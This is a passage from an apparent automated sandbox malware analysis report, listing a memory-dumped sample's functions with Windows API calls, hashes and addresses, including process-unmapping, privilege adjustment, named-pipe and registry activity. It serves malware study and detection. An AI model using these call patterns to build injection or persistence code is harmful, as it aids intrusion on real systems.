    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBB92, Relevance: 15.1, APIs: 10, Instructions: 109 Total matches: 83pipesynchronization
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
